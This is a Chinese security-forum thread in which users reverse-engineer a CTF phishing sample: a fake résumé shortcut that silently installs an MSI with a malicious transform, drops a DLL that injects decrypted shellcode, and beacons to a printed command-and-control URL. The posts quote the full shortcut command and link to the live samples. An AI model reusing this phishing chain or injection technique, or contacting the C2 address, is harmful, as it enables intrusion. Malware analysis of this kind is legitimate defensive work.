吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 834|回复: 6
收起左侧

[求助] ctf-lnk钓鱼逆向

[复制链接]
tomato798 发表于 2025-12-15 09:07
本帖最后由 tomato798 于 2025-12-15 10:14 编辑

线下参加了第一场ctf,有道题一直困惑着我,题:客服小可发现一份简历很可疑,找出falg,格式:flag{ip:port}
分析一下解题思路,可能会有一个坑,直接点击的话c2不会上线,因为试内网的ip,有一道应急的题当场netstat -ano有连接信息,回来后复现发现没有了,所以最好是直接逆向找出ip和端口

通过网盘分享的文件:高策-上海交通大学-个人简历.zip
链接: https://pan.baidu.com/s/1HJU4He3ggwmfaFp0Hq8ALA?pwd=7fkv 提取码: 7fkv
压缩包密码:52pojie

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

wumingpeng 发表于 2025-12-16 15:42
本帖最后由 wumingpeng 于 2025-12-16 15:55 编辑

解压后,里面有三个文件,其中’高策-上海交通大学-个人简历.docx’是一个快捷方式
image.png
然后右键->属性,可以看到点击该快捷方式后会执行命令‘C:\WINDOWS\system32\cmd.exe /c msiexec.exe /qn /i 获奖作品.zip TRANSFORMS=个人荣誉证明.zip && timeout /t 1 /nobreak && start winword  /f C:\Users\Public\1.docx’

1

1



问问deepseek,这条命令是干什么的

2

2

说白了,获奖作品.zip其实是一个MSI格式的文件,个人荣誉证明.zip是一个mst格式的文件,这条命令会运行获奖作品.zip,然后加载个人荣誉证明.zip。
一般MSI格式的病毒会把恶意代码放在要加载的mst文件中,这个mst文件相当于一个dll.
用WinHex打开个人荣誉证明.zip,在里面找到了一个PE文件,然后把它拔下来重命名noname.

3

3


用IDA载入,这个PE文件是一个DLL文件,有两个导出函数

4

4


其中SHELLCODE函数是一堆乱码,猜测是被加密了

5

5


那我们就从Init这个函数开始分析,这个函数会在C:\Users\Public\目录下释放两个文件
C:\Users\Public\1.docx和C:\\Users\\Public\\OneDrive.exe

6

6


7

7

然后获取加密的SHEELCODE,调用NtAllocateVirtualMemory函数申请内存空间并把解密后的SHELLCODE写入该内存空间

8

8


最后修改该空间的属性为可执行,并调用NtCreateThreadEx执行SHELLCODE,shellcode的功能就是获取WinExec函数然后用该函数运行前面释放的OneDrive

9

9

分析完后,我们知道该DLL会运行释放的OneDrive.exe,那我们接下来就分析这个样本。

该样本和之前的DLL差不多,也是用NtAllocateVirtualMemory来申请内存,然后把shellcode解密并写入该空间,然后修改属性执行shellcode.

10

10

具体怎么解密的就不管了,在申请的内存地址上直接看解密后的shellcode就可以了

11

11

解密完后,直接就在内存看到了https://106.75.233.238:4477/b3M2EZuPhY5WNlc0Pn5EOATUgDV8QKJ75WozGC8YLcxn0Cjaesk6Y77qqK0031S488E1M5

下图是shellcode,后面我就没继续调试shellcode具体做了什么了,反正已经抓到C2了,任务完成。


12

12

免费评分

参与人数 1吾爱币 +25 热心值 +1 收起 理由
爱飞的猫 + 25 + 1 用心讨论,共获提升!

查看全部评分

zxcvbnm12 发表于 2025-12-15 09:39
进来看到的看这里:
哥们你压缩包密码不对留错了,应该是52pojie
 楼主| tomato798 发表于 2025-12-15 10:15
zxcvbnm12 发表于 2025-12-15 09:39
进来看到的看这里:
哥们你压缩包密码不对留错了,应该是52pojie

感谢,我太粗心了
cattie 发表于 2025-12-15 12:16
本帖最后由 cattie 于 2025-12-15 15:23 编辑

写个一半的WriteUP吧

首先解压以后,发现那个看起来像docx的文件,可以看到,它的后缀名实际上是lnk。

image.png

打开,看到它的指向是:
C:\WINDOWS\system32\cmd.exe /c msiexec.exe /qn /i 获奖作品.zip TRANSFORMS=个人荣誉证明.zip && timeout /t 1 /nobreak && start winword  /f C:\Users\Public\1.docx

该命令会静默调用msiexec安装文件获奖作品.zip,并加载Transform文件个人荣誉证明.zip来修改安装行为,随后等待1秒并启动 Microsoft Word 打开 C:\Users\Public\1.docx 作为掩护。

用lessmsi解包获奖作品.zip,得到PCHealthCheck文件夹,这是微软官方的升级win11的助手,说明文件不在这里面。

image.png

用Orca解包并且看差异:

用 Orca 打开获奖作品.msi
点击:Transform → Apply Transform...
选择个人荣誉证明.mst
再点:Transform → View Transform

可以看到CustomAction里面多了一些内容:
image.png
image.png

在binary页面,双击WixUI_Bmp_Down的二进制数据部分,将其dump出来,得到binary.dll
接下来用ida分析这个dll就行了,应该是个dropper,会释放出docx和真正的exe文件


暂时没时间写下半部分,稍微看了一下,docx没加密,那个exe是用AES加密的bin payload,这样能免杀。

后续有空再继续分析

dll的链接: https://pan.baidu.com/s/1o_38zysrESaqjIDu0bCdZQ?pwd=y9qx
解压密码:52pojie

免费评分

参与人数 1吾爱币 +15 热心值 +1 收起 理由
爱飞的猫 + 15 + 1 用心讨论,共获提升!

查看全部评分

 楼主| tomato798 发表于 2025-12-15 15:46
cattie 发表于 2025-12-15 12:16
[md]
写个一半的WriteUP吧

感谢大佬指点,之前在网上搜了点教程解包了msi但是没看出来有什么问题给我卡住了,感谢感谢,我去看下一下
 楼主| tomato798 发表于 2025-12-17 17:56
wumingpeng 发表于 2025-12-16 15:42
解压后,里面有三个文件,其中’高策-上海交通大学-个人简历.docx’是一个快捷方式

然后右键->属性,可 ...

太强了师傅
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - 52pojie.cn ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2026-8-7 12:52

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表